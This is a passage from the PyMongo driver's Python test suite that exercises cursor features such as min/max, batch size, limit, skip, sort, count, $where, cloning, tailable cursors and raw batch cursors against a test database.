def find(max_spec, expected_index):
cursor = db.test.find().max(max_spec)
if client_context.requires_hint_with_min_max_queries:
cursor = cursor.hint(expected_index)
return cursor
cursor = find([("j", 3)], j_index)
self.assertEqual(len(list(cursor)), 3)
# Tuple.
cursor = find((("j", 3),), j_index)
self.assertEqual(len(list(cursor)), 3)
# Compound index.
index_keys = [("j", ASCENDING), ("k", ASCENDING)]
db.test.create_index(index_keys)
cursor = find([("j", 3), ("k", 3)], index_keys)
self.assertEqual(len(list(cursor)), 3)
# Wrong order.
cursor = find([("k", 3), ("j", 3)], index_keys)
self.assertRaises(OperationFailure, list, cursor)
# No such index.
cursor = find([("k", 3)], "k")
self.assertRaises(OperationFailure, list, cursor)
self.assertRaises(TypeError, db.test.find().max, 10)
self.assertRaises(TypeError, db.test.find().max, {"j": 10})
@ignore_deprecations # Ignore min without hint.
def test_min(self):
db = self.db
db.test.drop()
j_index = [("j", ASCENDING)]
db.test.create_index(j_index)
db.test.insert_many([{"j": j, "k": j} for j in range(10)])
def find(min_spec, expected_index):
cursor = db.test.find().min(min_spec)
if client_context.requires_hint_with_min_max_queries:
cursor = cursor.hint(expected_index)
return cursor
cursor = find([("j", 3)], j_index)
self.assertEqual(len(list(cursor)), 7)
# Tuple.
cursor = find((("j", 3),), j_index)
self.assertEqual(len(list(cursor)), 7)
# Compound index.
index_keys = [("j", ASCENDING), ("k", ASCENDING)]
db.test.create_index(index_keys)
cursor = find([("j", 3), ("k", 3)], index_keys)
self.assertEqual(len(list(cursor)), 7)
# Wrong order.
cursor = find([("k", 3), ("j", 3)], index_keys)
self.assertRaises(OperationFailure, list, cursor)
# No such index.
cursor = find([("k", 3)], "k")
self.assertRaises(OperationFailure, list, cursor)
self.assertRaises(TypeError, db.test.find().min, 10)
self.assertRaises(TypeError, db.test.find().min, {"j": 10})
@client_context.require_version_max(4, 1, -1)
def test_min_max_without_hint(self):
coll = self.db.test
j_index = [("j", ASCENDING)]
coll.create_index(j_index)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("default", DeprecationWarning)
list(coll.find().min([("j", 3)]))
self.assertIn('using a min/max query operator', str(warns[0]))
# Ensure the warning is raised with the proper stack level.
del warns[:]
list(coll.find().min([("j", 3)]))
self.assertIn('using a min/max query operator', str(warns[0]))
del warns[:]
list(coll.find().max([("j", 3)]))
self.assertIn('using a min/max query operator', str(warns[0]))
def test_batch_size(self):
db = self.db
db.test.drop()
db.test.insert_many([{"x": x} for x in range(200)])
self.assertRaises(TypeError, db.test.find().batch_size, None)
self.assertRaises(TypeError, db.test.find().batch_size, "hello")
self.assertRaises(TypeError, db.test.find().batch_size, 5.5)
self.assertRaises(ValueError, db.test.find().batch_size, -1)
self.assertTrue(db.test.find().batch_size(long(5)))
a = db.test.find()
for _ in a:
break
self.assertRaises(InvalidOperation, a.batch_size, 5)
def cursor_count(cursor, expected_count):
count = 0
for _ in cursor:
count += 1
self.assertEqual(expected_count, count)
cursor_count(db.test.find().batch_size(0), 200)
cursor_count(db.test.find().batch_size(1), 200)
cursor_count(db.test.find().batch_size(2), 200)
cursor_count(db.test.find().batch_size(5), 200)
cursor_count(db.test.find().batch_size(100), 200)
cursor_count(db.test.find().batch_size(500), 200)
cursor_count(db.test.find().batch_size(0).limit(1), 1)
cursor_count(db.test.find().batch_size(1).limit(1), 1)
cursor_count(db.test.find().batch_size(2).limit(1), 1)
cursor_count(db.test.find().batch_size(5).limit(1), 1)
cursor_count(db.test.find().batch_size(100).limit(1), 1)
cursor_count(db.test.find().batch_size(500).limit(1), 1)
cursor_count(db.test.find().batch_size(0).limit(10), 10)
cursor_count(db.test.find().batch_size(1).limit(10), 10)
cursor_count(db.test.find().batch_size(2).limit(10), 10)
cursor_count(db.test.find().batch_size(5).limit(10), 10)
cursor_count(db.test.find().batch_size(100).limit(10), 10)
cursor_count(db.test.find().batch_size(500).limit(10), 10)
cur = db.test.find().batch_size(1)
next(cur)
if client_context.version.at_least(3, 1, 9):
# find command batchSize should be 1
self.assertEqual(0, len(cur._Cursor__data))
else:
# OP_QUERY ntoreturn should be 2
self.assertEqual(1, len(cur._Cursor__data))
next(cur)
self.assertEqual(0, len(cur._Cursor__data))
next(cur)
self.assertEqual(0, len(cur._Cursor__data))
next(cur)
self.assertEqual(0, len(cur._Cursor__data))
def test_limit_and_batch_size(self):
db = self.db
db.test.drop()
db.test.insert_many([{"x": x} for x in range(500)])
curs = db.test.find().limit(0).batch_size(10)
next(curs)
self.assertEqual(10, curs._Cursor__retrieved)
curs = db.test.find(limit=0, batch_size=10)
next(curs)
self.assertEqual(10, curs._Cursor__retrieved)
curs = db.test.find().limit(-2).batch_size(0)
next(curs)
self.assertEqual(2, curs._Cursor__retrieved)
curs = db.test.find(limit=-2, batch_size=0)
next(curs)
self.assertEqual(2, curs._Cursor__retrieved)
curs = db.test.find().limit(-4).batch_size(5)
next(curs)
self.assertEqual(4, curs._Cursor__retrieved)
curs = db.test.find(limit=-4, batch_size=5)
next(curs)
self.assertEqual(4, curs._Cursor__retrieved)
curs = db.test.find().limit(50).batch_size(500)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
curs = db.test.find(limit=50, batch_size=500)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
curs = db.test.find().batch_size(500)
next(curs)
self.assertEqual(500, curs._Cursor__retrieved)
curs = db.test.find(batch_size=500)
next(curs)
self.assertEqual(500, curs._Cursor__retrieved)
curs = db.test.find().limit(50)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
curs = db.test.find(limit=50)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
# these two might be shaky, as the default
# is set by the server. as of 2.0.0-rc0, 101
# or 1MB (whichever is smaller) is default
# for queries without ntoreturn
curs = db.test.find()
next(curs)
self.assertEqual(101, curs._Cursor__retrieved)
curs = db.test.find().limit(0).batch_size(0)
next(curs)
self.assertEqual(101, curs._Cursor__retrieved)
curs = db.test.find(limit=0, batch_size=0)
next(curs)
self.assertEqual(101, curs._Cursor__retrieved)
def test_skip(self):
db = self.db
self.assertRaises(TypeError, db.test.find().skip, None)
self.assertRaises(TypeError, db.test.find().skip, "hello")
self.assertRaises(TypeError, db.test.find().skip, 5.5)
self.assertRaises(ValueError, db.test.find().skip, -5)
self.assertTrue(db.test.find().skip(long(5)))
db.drop_collection("test")
db.test.insert_many([{"x": i} for i in range(100)])
for i in db.test.find():
self.assertEqual(i["x"], 0)
break
for i in db.test.find().skip(20):
self.assertEqual(i["x"], 20)
break
for i in db.test.find().skip(99):
self.assertEqual(i["x"], 99)
break
for i in db.test.find().skip(1):
self.assertEqual(i["x"], 1)
break
for i in db.test.find().skip(0):
self.assertEqual(i["x"], 0)
break
for i in db.test.find().skip(0).skip(50).skip(10):
self.assertEqual(i["x"], 10)
break
for i in db.test.find().skip(1000):
self.fail()
a = db.test.find()
a.skip(10)
for _ in a:
break
self.assertRaises(InvalidOperation, a.skip, 5)
def test_sort(self):
db = self.db
self.assertRaises(TypeError, db.test.find().sort, 5)
self.assertRaises(ValueError, db.test.find().sort, [])
self.assertRaises(TypeError, db.test.find().sort, [], ASCENDING)
self.assertRaises(TypeError, db.test.find().sort,
[("hello", DESCENDING)], DESCENDING)
db.test.drop()
unsort = list(range(10))
random.shuffle(unsort)
db.test.insert_many([{"x": i} for i in unsort])
asc = [i["x"] for i in db.test.find().sort("x", ASCENDING)]
self.assertEqual(asc, list(range(10)))
asc = [i["x"] for i in db.test.find().sort("x")]
self.assertEqual(asc, list(range(10)))
asc = [i["x"] for i in db.test.find().sort([("x", ASCENDING)])]
self.assertEqual(asc, list(range(10)))
expect = list(reversed(range(10)))
desc = [i["x"] for i in db.test.find().sort("x", DESCENDING)]
self.assertEqual(desc, expect)
desc = [i["x"] for i in db.test.find().sort([("x", DESCENDING)])]
self.assertEqual(desc, expect)
desc = [i["x"] for i in
db.test.find().sort("x", ASCENDING).sort("x", DESCENDING)]
self.assertEqual(desc, expect)
expected = [(1, 5), (2, 5), (0, 3), (7, 3), (9, 2), (2, 1), (3, 1)]
shuffled = list(expected)
random.shuffle(shuffled)
db.test.drop()
for (a, b) in shuffled:
db.test.insert_one({"a": a, "b": b})
result = [(i["a"], i["b"]) for i in
db.test.find().sort([("b", DESCENDING),
("a", ASCENDING)])]
self.assertEqual(result, expected)
a = db.test.find()
a.sort("x", ASCENDING)
for _ in a:
break
self.assertRaises(InvalidOperation, a.sort, "x", ASCENDING)
@ignore_deprecations
def test_count(self):
db = self.db
db.test.drop()
self.assertEqual(0, db.test.find().count())
db.test.insert_many([{"x": i} for i in range(10)])
self.assertEqual(10, db.test.find().count())
self.assertTrue(isinstance(db.test.find().count(), int))
self.assertEqual(10, db.test.find().limit(5).count())
self.assertEqual(10, db.test.find().skip(5).count())
self.assertEqual(1, db.test.find({"x": 1}).count())
self.assertEqual(5, db.test.find({"x": {"$lt": 5}}).count())
a = db.test.find()
b = a.count()
for _ in a:
break
self.assertEqual(b, a.count())
self.assertEqual(0, db.test.acollectionthatdoesntexist.find().count())
@ignore_deprecations
def test_count_with_hint(self):
collection = self.db.test
collection.drop()
collection.insert_many([{'i': 1}, {'i': 2}])
self.assertEqual(2, collection.find().count())
collection.create_index([('i', 1)])
self.assertEqual(1, collection.find({'i': 1}).hint("_id_").count())
self.assertEqual(2, collection.find().hint("_id_").count())
self.assertRaises(OperationFailure,
collection.find({'i': 1}).hint("BAD HINT").count)
# Create a sparse index which should have no entries.
collection.create_index([('x', 1)], sparse=True)
self.assertEqual(0, collection.find({'i': 1}).hint("x_1").count())
self.assertEqual(
0, collection.find({'i': 1}).hint([("x", 1)]).count())
if client_context.version.at_least(3, 3, 2):
self.assertEqual(0, collection.find().hint("x_1").count())
self.assertEqual(0, collection.find().hint([("x", 1)]).count())
else:
self.assertEqual(2, collection.find().hint("x_1").count())
self.assertEqual(2, collection.find().hint([("x", 1)]).count())
@ignore_deprecations
def test_where(self):
db = self.db
db.test.drop()
a = db.test.find()
self.assertRaises(TypeError, a.where, 5)
self.assertRaises(TypeError, a.where, None)
self.assertRaises(TypeError, a.where, {})
db.test.insert_many([{"x": i} for i in range(10)])
self.assertEqual(3, len(list(db.test.find().where('this.x < 3'))))
self.assertEqual(3,
len(list(db.test.find().where(Code('this.x < 3')))))
code_with_scope = Code('this.x < i', {"i": 3})
if client_context.version.at_least(4, 3, 3):
# MongoDB 4.4 removed support for Code with scope.
with self.assertRaises(OperationFailure):
list(db.test.find().where(code_with_scope))
code_with_empty_scope = Code('this.x < 3', {})
with self.assertRaises(OperationFailure):
list(db.test.find().where(code_with_empty_scope))
else:
self.assertEqual(
3, len(list(db.test.find().where(code_with_scope))))
self.assertEqual(10, len(list(db.test.find())))
self.assertEqual(3, db.test.find().where('this.x < 3').count())
self.assertEqual(10, db.test.find().count())
self.assertEqual(3, db.test.find().where(u'this.x < 3').count())
self.assertEqual([0, 1, 2],
[a["x"] for a in
db.test.find().where('this.x < 3')])
self.assertEqual([],
[a["x"] for a in
db.test.find({"x": 5}).where('this.x < 3')])
self.assertEqual([5],
[a["x"] for a in
db.test.find({"x": 5}).where('this.x > 3')])
cursor = db.test.find().where('this.x < 3').where('this.x > 7')
self.assertEqual([8, 9], [a["x"] for a in cursor])
a = db.test.find()
b = a.where('this.x > 3')
for _ in a:
break
self.assertRaises(InvalidOperation, a.where, 'this.x < 3')
def test_rewind(self):
self.db.test.insert_many([{"x": i} for i in range(1, 4)])
cursor = self.db.test.find().limit(2)
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
count = 0
for _ in cursor:
count += 1
self.assertEqual(0, count)
cursor.rewind()
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
cursor.rewind()
count = 0
for _ in cursor:
break
cursor.rewind()
for _ in cursor:
count += 1
self.assertEqual(2, count)
self.assertEqual(cursor, cursor.rewind())
def test_clone(self):
self.db.test.insert_many([{"x": i} for i in range(1, 4)])
cursor = self.db.test.find().limit(2)
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
count = 0
for _ in cursor:
count += 1
self.assertEqual(0, count)
cursor = cursor.clone()
cursor2 = cursor.clone()
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
for _ in cursor2:
count += 1
self.assertEqual(4, count)
cursor.rewind()
count = 0
for _ in cursor:
break
cursor = cursor.clone()
for _ in cursor:
count += 1
self.assertEqual(2, count)
self.assertNotEqual(cursor, cursor.clone())
# Just test attributes
cursor = self.db.test.find({"x": re.compile("^hello.*")},
skip=1,
no_cursor_timeout=True,
cursor_type=CursorType.TAILABLE_AWAIT,
allow_partial_results=True,
manipulate=False,
projection={'_id': False}).limit(2)
cursor.min([('a', 1)]).max([('b', 3)])
cursor.add_option(128)
cursor.comment('hi!')
cursor2 = cursor.clone()
self.assertEqual(cursor._Cursor__skip, cursor2._Cursor__skip)
self.assertEqual(cursor._Cursor__limit, cursor2._Cursor__limit)
self.assertEqual(type(cursor._Cursor__codec_options),
type(cursor2._Cursor__codec_options))
self.assertEqual(cursor._Cursor__manipulate,
cursor2._Cursor__manipulate)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__comment,
cursor2._Cursor__comment)
self.assertEqual(cursor._Cursor__min,
cursor2._Cursor__min)
self.assertEqual(cursor._Cursor__max,
cursor2._Cursor__max)
# Shallow copies share the projection dict, so mutating the copy mutates the original
cursor2 = copy.copy(cursor)
cursor2._Cursor__projection['cursor2'] = False
self.assertTrue('cursor2' in cursor._Cursor__projection)
# Deep copies do not share state, so mutating the copy shouldn't affect the original
cursor3 = copy.deepcopy(cursor)
cursor3._Cursor__projection['cursor3'] = False
self.assertFalse('cursor3' in cursor._Cursor__projection)
cursor4 = cursor.clone()
cursor4._Cursor__projection['cursor4'] = False
self.assertFalse('cursor4' in cursor._Cursor__projection)
# Test memo when deepcopying queries
query = {"hello": "world"}
query["reflexive"] = query
cursor = self.db.test.find(query)
cursor2 = copy.deepcopy(cursor)
self.assertNotEqual(id(cursor._Cursor__spec),
id(cursor2._Cursor__spec))
self.assertEqual(id(cursor2._Cursor__spec['reflexive']),
id(cursor2._Cursor__spec))
self.assertEqual(len(cursor2._Cursor__spec), 2)
# Ensure hints are cloned as the correct type
cursor = self.db.test.find().hint([('z', 1), ("a", 1)])
cursor2 = copy.deepcopy(cursor)
self.assertTrue(isinstance(cursor2._Cursor__hint, SON))
self.assertEqual(cursor._Cursor__hint, cursor2._Cursor__hint)
@ignore_deprecations
def test_count_with_fields(self):
self.db.test.drop()
self.db.test.insert_one({"x": 1})
self.assertEqual(1, self.db.test.find({}, ["a"]).count())
def test_bad_getitem(self):
self.assertRaises(TypeError, lambda x: self.db.test.find()[x], "hello")
self.assertRaises(TypeError, lambda x: self.db.test.find()[x], 5.5)
self.assertRaises(TypeError, lambda x: self.db.test.find()[x], None)
def test_getitem_slice_index(self):
self.db.drop_collection("test")
self.db.test.insert_many([{"i": i} for i in range(100)])
count = itertools.count
self.assertRaises(IndexError, lambda: self.db.test.find()[-1:])
self.assertRaises(IndexError, lambda: self.db.test.find()[1:2:2])
for a, b in zip(count(0), self.db.test.find()):
self.assertEqual(a, b['i'])
self.assertEqual(100, len(list(self.db.test.find()[0:])))
for a, b in zip(count(0), self.db.test.find()[0:]):
self.assertEqual(a, b['i'])
self.assertEqual(80, len(list(self.db.test.find()[20:])))
for a, b in zip(count(20), self.db.test.find()[20:]):
self.assertEqual(a, b['i'])
for a, b in zip(count(99), self.db.test.find()[99:]):
self.assertEqual(a, b['i'])
for i in self.db.test.find()[1000:]:
self.fail()
self.assertEqual(5, len(list(self.db.test.find()[20:25])))
self.assertEqual(5, len(list(
self.db.test.find()[long(20):long(25)])))
for a, b in zip(count(20), self.db.test.find()[20:25]):
self.assertEqual(a, b['i'])
self.assertEqual(80, len(list(self.db.test.find()[40:45][20:])))
for a, b in zip(count(20), self.db.test.find()[40:45][20:]):
self.assertEqual(a, b['i'])
self.assertEqual(80,
len(list(self.db.test.find()[40:45].limit(0).skip(20))
)
)
for a, b in zip(count(20),
self.db.test.find()[40:45].limit(0).skip(20)):
self.assertEqual(a, b['i'])
self.assertEqual(80,
len(list(self.db.test.find().limit(10).skip(40)[20:]))
)
for a, b in zip(count(20),
self.db.test.find().limit(10).skip(40)[20:]):
self.assertEqual(a, b['i'])
self.assertEqual(1, len(list(self.db.test.find()[:1])))
self.assertEqual(5, len(list(self.db.test.find()[:5])))
self.assertEqual(1, len(list(self.db.test.find()[99:100])))
self.assertEqual(1, len(list(self.db.test.find()[99:1000])))
self.assertEqual(0, len(list(self.db.test.find()[10:10])))
self.assertEqual(0, len(list(self.db.test.find()[:0])))
self.assertEqual(80,
len(list(self.db.test.find()[10:10].limit(0).skip(20))
)
)
self.assertRaises(IndexError, lambda: self.db.test.find()[10:8])
def test_getitem_numeric_index(self):
self.db.drop_collection("test")
self.db.test.insert_many([{"i": i} for i in range(100)])
self.assertEqual(0, self.db.test.find()[0]['i'])
self.assertEqual(50, self.db.test.find()[50]['i'])
self.assertEqual(50, self.db.test.find().skip(50)[0]['i'])
self.assertEqual(50, self.db.test.find().skip(49)[1]['i'])
self.assertEqual(50, self.db.test.find()[long(50)]['i'])
self.assertEqual(99, self.db.test.find()[99]['i'])
self.assertRaises(IndexError, lambda x: self.db.test.find()[x], -1)
self.assertRaises(IndexError, lambda x: self.db.test.find()[x], 100)
self.assertRaises(IndexError,
lambda x: self.db.test.find().skip(50)[x], 50)
@ignore_deprecations
def test_count_with_limit_and_skip(self):
self.assertRaises(TypeError, self.db.test.find().count, "foo")
def check_len(cursor, length):
self.assertEqual(len(list(cursor)), cursor.count(True))
self.assertEqual(length, cursor.count(True))
self.db.drop_collection("test")
self.db.test.insert_many([{"i": i} for i in range(100)])
check_len(self.db.test.find(), 100)
check_len(self.db.test.find().limit(10), 10)
check_len(self.db.test.find().limit(110), 100)
check_len(self.db.test.find().skip(10), 90)
check_len(self.db.test.find().skip(110), 0)
check_len(self.db.test.find().limit(10).skip(10), 10)
check_len(self.db.test.find()[10:20], 10)
check_len(self.db.test.find().limit(10).skip(95), 5)
check_len(self.db.test.find()[95:105], 5)
def test_len(self):
self.assertRaises(TypeError, len, self.db.test.find())
def test_properties(self):
self.assertEqual(self.db.test, self.db.test.find().collection)
def set_coll():
self.db.test.find().collection = "hello"
self.assertRaises(AttributeError, set_coll)
def test_get_more(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{'i': i} for i in range(10)])
self.assertEqual(10, len(list(db.test.find().batch_size(5))))
def test_tailable(self):
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=1000, max=3)
self.addCleanup(db.drop_collection, "test")
cursor = db.test.find(cursor_type=CursorType.TAILABLE)
db.test.insert_one({"x": 1})
count = 0
for doc in cursor:
count += 1
self.assertEqual(1, doc["x"])
self.assertEqual(1, count)
db.test.insert_one({"x": 2})
count = 0
for doc in cursor:
count += 1
self.assertEqual(2, doc["x"])
self.assertEqual(1, count)
db.test.insert_one({"x": 3})
count = 0
for doc in cursor:
count += 1
self.assertEqual(3, doc["x"])
self.assertEqual(1, count)
# Capped rollover - the collection can never
# have more than 3 documents. Just make sure
# this doesn't raise...
db.test.insert_many([{"x": i} for i in range(4, 7)])
self.assertEqual(0, len(list(cursor)))
# and that the cursor doesn't think it's still alive.
self.assertFalse(cursor.alive)
self.assertEqual(3, db.test.count_documents({}))
# __getitem__(index)
for cursor in (db.test.find(cursor_type=CursorType.TAILABLE),
db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)):
self.assertEqual(4, cursor[0]["x"])
self.assertEqual(5, cursor[1]["x"])
self.assertEqual(6, cursor[2]["x"])
cursor.rewind()
self.assertEqual([4], [doc["x"] for doc in cursor[0:1]])
cursor.rewind()
self.assertEqual([5], [doc["x"] for doc in cursor[1:2]])
cursor.rewind()
self.assertEqual([6], [doc["x"] for doc in cursor[2:3]])
cursor.rewind()
self.assertEqual([4, 5], [doc["x"] for doc in cursor[0:2]])
cursor.rewind()
self.assertEqual([5, 6], [doc["x"] for doc in cursor[1:3]])
cursor.rewind()
self.assertEqual([4, 5, 6], [doc["x"] for doc in cursor[0:3]])
def test_concurrent_close(self):
"""Ensure a tailable can be closed from another thread."""
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=1000, max=3)
self.addCleanup(db.drop_collection, "test")
cursor = db.test.find(cursor_type=CursorType.TAILABLE)
def iterate_cursor():
while cursor.alive:
for doc in cursor:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
time.sleep(1)
cursor.close()
self.assertFalse(cursor.alive)
t.join(3)
self.assertFalse(t.is_alive())
def test_distinct(self):
self.db.drop_collection("test")
self.db.test.insert_many(
[{"a": 1}, {"a": 2}, {"a": 2}, {"a": 2}, {"a": 3}])
distinct = self.db.test.find({"a": {"$lt": 3}}).distinct("a")
distinct.sort()
self.assertEqual([1, 2], distinct)
self.db.drop_collection("test")
self.db.test.insert_one({"a": {"b": "a"}, "c": 12})
self.db.test.insert_one({"a": {"b": "b"}, "c": 8})
self.db.test.insert_one({"a": {"b": "c"}, "c": 12})
self.db.test.insert_one({"a": {"b": "c"}, "c": 8})
distinct = self.db.test.find({"c": 8}).distinct("a.b")
distinct.sort()
self.assertEqual(["b", "c"], distinct)
@client_context.require_version_max(4, 1, 0, -1)
def test_max_scan(self):
self.db.drop_collection("test")
self.db.test.insert_many([{} for _ in range(100)])
self.assertEqual(100, len(list(self.db.test.find())))
self.assertEqual(50, len(list(self.db.test.find().max_scan(50))))
self.assertEqual(50, len(list(self.db.test.find()
.max_scan(90).max_scan(50))))
def test_with_statement(self):
self.db.drop_collection("test")
self.db.test.insert_many([{} for _ in range(100)])
c1 = self.db.test.find()
with self.db.test.find() as c2:
self.assertTrue(c2.alive)
self.assertFalse(c2.alive)
with self.db.test.find() as c2:
self.assertEqual(100, len(list(c2)))
self.assertFalse(c2.alive)
self.assertTrue(c1.alive)
@client_context.require_no_mongos
@ignore_deprecations
def test_comment(self):
# MongoDB 3.1.5 changed the ns for commands.
regex = {'$regex': r'pymongo_test.(\$cmd|test)'}
if client_context.version.at_least(3, 5, 8, -1):
query_key = "command.comment"
elif client_context.version.at_least(3, 1, 8, -1):
query_key = "query.comment"
else:
query_key = "query.$comment"
self.client.drop_database(self.db)
self.db.set_profiling_level(ALL)
try:
list(self.db.test.find().comment('foo'))
op = self.db.system.profile.find({'ns': 'pymongo_test.test',
'op': 'query',
query_key: 'foo'})
self.assertEqual(op.count(), 1)
self.db.test.find().comment('foo').count()
op = self.db.system.profile.find({'ns': regex,
'op': 'command',
'command.count': 'test',
'command.comment': 'foo'})
self.assertEqual(op.count(), 1)
self.db.test.find().comment('foo').distinct('type')
op = self.db.system.profile.find({'ns': regex,
'op': 'command',
'command.distinct': 'test',
'command.comment': 'foo'})
self.assertEqual(op.count(), 1)
finally:
self.db.set_profiling_level(OFF)
self.db.system.profile.drop()
self.db.test.insert_many([{}, {}])
cursor = self.db.test.find()
next(cursor)
self.assertRaises(InvalidOperation, cursor.comment, 'hello')
def test_modifiers(self):
c = self.db.test
# "modifiers" is deprecated.
with ignore_deprecations():
cur = c.find()
self.assertTrue('$query' not in cur._Cursor__query_spec())
cur = c.find().comment("testing").max_time_ms(500)
self.assertTrue('$query' in cur._Cursor__query_spec())
self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing")
self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500)
cur = c.find(
modifiers={"$maxTimeMS": 500, "$comment": "testing"})
self.assertTrue('$query' in cur._Cursor__query_spec())
self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing")
self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500)
# Keyword arg overwrites modifier.
# If we remove the "modifiers" arg, delete this test after checking
# that TestCommandMonitoring.test_find_options covers all cases.
cur = c.find(comment="hi", modifiers={"$comment": "bye"})
self.assertEqual(cur._Cursor__query_spec()["$comment"], "hi")
cur = c.find(max_scan=1, modifiers={"$maxScan": 2})
self.assertEqual(cur._Cursor__query_spec()["$maxScan"], 1)
cur = c.find(max_time_ms=1, modifiers={"$maxTimeMS": 2})
self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 1)
cur = c.find(min=1, modifiers={"$min": 2})
self.assertEqual(cur._Cursor__query_spec()["$min"], 1)
cur = c.find(max=1, modifiers={"$max": 2})
self.assertEqual(cur._Cursor__query_spec()["$max"], 1)
cur = c.find(return_key=True, modifiers={"$returnKey": False})
self.assertEqual(cur._Cursor__query_spec()["$returnKey"], True)
cur = c.find(hint=[("a", 1)], modifiers={"$hint": {"b": "1"}})
self.assertEqual(cur._Cursor__query_spec()["$hint"], {"a": 1})
# The arg is named show_record_id after the "find" command arg, the
# modifier is named $showDiskLoc for the OP_QUERY modifier. It's
# stored as $showDiskLoc then upgraded to showRecordId if we send a
# "find" command.
cur = c.find(show_record_id=True, modifiers={"$showDiskLoc": False})
self.assertEqual(cur._Cursor__query_spec()["$showDiskLoc"], True)
if not client_context.version.at_least(3, 7, 3):
cur = c.find(snapshot=True, modifiers={"$snapshot": False})
self.assertEqual(cur._Cursor__query_spec()["$snapshot"], True)
def test_alive(self):
self.db.test.delete_many({})
self.db.test.insert_many([{} for _ in range(3)])
self.addCleanup(self.db.test.delete_many, {})
cursor = self.db.test.find().batch_size(2)
n = 0
while True:
cursor.next()
n += 1
if 3 == n:
self.assertFalse(cursor.alive)
break
self.assertTrue(cursor.alive)
def test_close_kills_cursor_synchronously(self):
# Kill any cursors possibly queued up by previous tests.
gc.collect()
self.client._process_periodic_tasks()
listener = WhiteListEventListener("killCursors")
results = listener.results
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
coll = client[self.db.name].test_close_kills_cursors
# Add some test data.
docs_inserted = 1000
coll.insert_many([{"i": i} for i in range(docs_inserted)])
results.clear()
# Close a cursor while it's still open on the server.
cursor = coll.find().batch_size(10)
self.assertTrue(bool(next(cursor)))
self.assertLess(cursor.retrieved, docs_inserted)
cursor.close()
def assertCursorKilled():
self.assertEqual(1, len(results["started"]))
self.assertEqual("killCursors", results["started"][0].command_name)
self.assertEqual(1, len(results["succeeded"]))
self.assertEqual("killCursors",
results["succeeded"][0].command_name)
assertCursorKilled()
results.clear()
# Close a command cursor while it's still open on the server.
cursor = coll.aggregate([], batchSize=10)
self.assertTrue(bool(next(cursor)))
cursor.close()
# The cursor should be killed if it had a non-zero id.
if cursor.cursor_id:
assertCursorKilled()
else:
self.assertEqual(0, len(results["started"]))
def test_delete_not_initialized(self):
# Creating a cursor with invalid arguments will not run __init__
# but will still call __del__, eg test.find(invalidKwarg=1).
cursor = Cursor.__new__(Cursor) # Skip calling __init__
cursor.__del__() # no error
@client_context.require_version_min(3, 6)
def test_getMore_does_not_send_readPreference(self):
listener = WhiteListEventListener('find', 'getMore')
client = rs_or_single_client(
event_listeners=[listener])
self.addCleanup(client.close)
coll = client[self.db.name].test
coll.delete_many({})
coll.insert_many([{} for _ in range(5)])
self.addCleanup(coll.drop)
list(coll.find(batch_size=3))
started = listener.results['started']
self.assertEqual(2, len(started))
self.assertEqual('find', started[0].command_name)
self.assertIn('$readPreference', started[0].command)
self.assertEqual('getMore', started[1].command_name)
self.assertNotIn('$readPreference', started[1].command)
class TestRawBatchCursor(IntegrationTest):
def test_find_raw(self):
c = self.db.test
c.drop()
docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)]
c.insert_many(docs)
batches = list(c.find_raw_batches().sort('_id'))
self.assertEqual(1, len(batches))
self.assertEqual(docs, decode_all(batches[0]))
def test_manipulate(self):
c = self.db.test
with self.assertRaises(InvalidOperation):
c.find_raw_batches(manipulate=True)
def test_explain(self):
c = self.db.test
c.insert_one({})
explanation = c.find_raw_batches().explain()
self.assertIsInstance(explanation, dict)
def test_clone(self):
cursor = self.db.test.find_raw_batches()
# Copy of a RawBatchCursor is also a RawBatchCursor, not a Cursor.
self.assertIsInstance(next(cursor.clone()), bytes)
self.assertIsInstance(next(copy.copy(cursor)), bytes)
@client_context.require_no_mongos
def test_exhaust(self):
c = self.db.test
c.drop()
c.insert_many({'_id': i} for i in range(200))
result = b''.join(c.find_raw_batches(cursor_type=CursorType.EXHAUST))
self.assertEqual([{'_id': i} for i in range(200)], decode_all(result))
def test_server_error(self):
with self.assertRaises(OperationFailure) as exc:
next(self.db.test.find_raw_batches({'x': {'$bad': 1}}))
# The server response was decoded, not left raw.
self.assertIsInstance(exc.exception.details, dict)
def test_get_item(self):
with self.assertRaises(InvalidOperation):
self.db.test.find_raw_batches()[0]
@client_context.require_version_min(3, 4)
def test_collation(self):
next(self.db.test.find_raw_batches(collation=Collation('en_US')))
@client_context.require_version_max(3, 2)
def test_collation_error(self):
with self.assertRaises(ConfigurationError):
next(self.db.test.find_raw_batches(collation=Collation('en_US')))
@client_context.require_version_min(3, 2)
def test_read_concern(self):
c = self.db.get_collection("test", read_concern=ReadConcern("majority"))
next(c.find_raw_batches())
@client_context.require_version_max(3, 1)
def test_read_concern_error(self):
c = self.db.get_collection("test", read_concern=ReadConcern("majority"))
with self.assertRaises(ConfigurationError):
next(c.find_raw_batches())
def test_monitoring(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
c = client.pymongo_test.test
c.drop()
c.insert_many([{'_id': i} for i in range(10)])
listener.results.clear()
cursor = c.find_raw_batches(batch_size=4)
# First raw batch of 4 documents.
next(cursor)
started = listener.results['started'][0]
succeeded = listener.results['succeeded'][0]
self.assertEqual(0, len(listener.results['failed']))
self.assertEqual('find', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('find', succeeded.command_name)
csr = succeeded.reply["cursor"]
